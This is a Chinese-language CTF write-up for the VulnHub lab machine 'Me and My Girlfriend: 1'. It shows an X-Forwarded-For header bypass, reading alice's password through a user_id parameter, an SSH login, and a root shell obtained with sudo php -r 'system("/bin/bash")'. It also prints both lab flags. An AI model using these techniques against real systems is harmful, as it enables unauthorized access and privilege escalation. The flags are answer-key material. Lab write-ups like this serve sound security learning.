VulnHub ME AND MY GIRLFRIEND: 1 writeup

下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

flag1

xff绕过

1
x-forwarded-for:127.0.0.1

注册admin成功,点击Profile发现id参数,访问index.php?page=profile&user_id=5可以看到alice密码4lic3
ssh登录找到flag1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
❯ ssh alice@192.168.231.21
The authenticity of host '192.168.231.21 (192.168.231.21)' can't be established.
ECDSA key fingerprint is SHA256:lE5D8AvkJqcIwHiNuI9aSnC3ohlDrhPhjDljqSDy9sY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.231.21' (ECDSA) to the list of known hosts.
alice@192.168.231.21's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ ls -la
total 32
drwxr-xr-x 4 alice alice 4096 Dec 13 2019 .
drwxr-xr-x 6 root root 4096 Dec 13 2019 ..
-rw------- 1 alice alice 10 Dec 13 2019 .bash_history
-rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout
-rw-r--r-- 1 alice alice 3637 Dec 13 2019 .bashrc
drwx------ 2 alice alice 4096 Dec 13 2019 .cache
drwxrwxr-x 2 alice alice 4096 Dec 13 2019 .my_secret
-rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -la
total 16
drwxrwxr-x 2 alice alice 4096 Dec 13 2019 .
drwxr-xr-x 4 alice alice 4096 Dec 13 2019 ..
-rw-r--r-- 1 root root 306 Dec 13 2019 flag1.txt
-rw-rw-r-- 1 alice alice 119 Dec 13 2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

flag2

查看alice权限,发现能sudo php,可以php注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
alice@gfriEND:~/.my_secret$ sudo -l
Matching Defaults entries for alice on gfriEND:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on gfriEND:
(root) NOPASSWD: /usr/bin/php
alice@gfriEND:~/.my_secret$ sudo php -r 'system("/bin/bash");'
root@gfriEND:~/.my_secret# cd /
root@gfriEND:/# find / -name flag2.txt
/root/flag2.txt
root@gfriEND:/# cat /root/flag2.txt

________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}